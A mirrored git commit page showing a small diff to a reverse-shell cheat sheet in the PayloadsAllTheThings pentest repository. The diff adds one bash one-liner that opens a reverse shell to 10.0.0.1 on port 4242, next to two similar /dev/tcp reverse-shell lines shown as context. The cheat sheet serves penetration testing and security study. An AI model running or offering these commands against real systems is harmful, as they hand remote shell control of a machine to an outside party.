mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Merge pull request #348 from pswalia2u/patch-1
Update Reverse Shell Cheatsheet.md
This commit is contained in:
commit
1592756f9c
1 changed files with 2 additions and 0 deletions
|
@ -46,6 +46,8 @@
|
|||
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
|
||||
|
||||
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
|
||||
|
||||
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1
|
||||
```
|
||||
|
||||
### Bash UDP
|
||||
|
|
Loading…
Reference in a new issue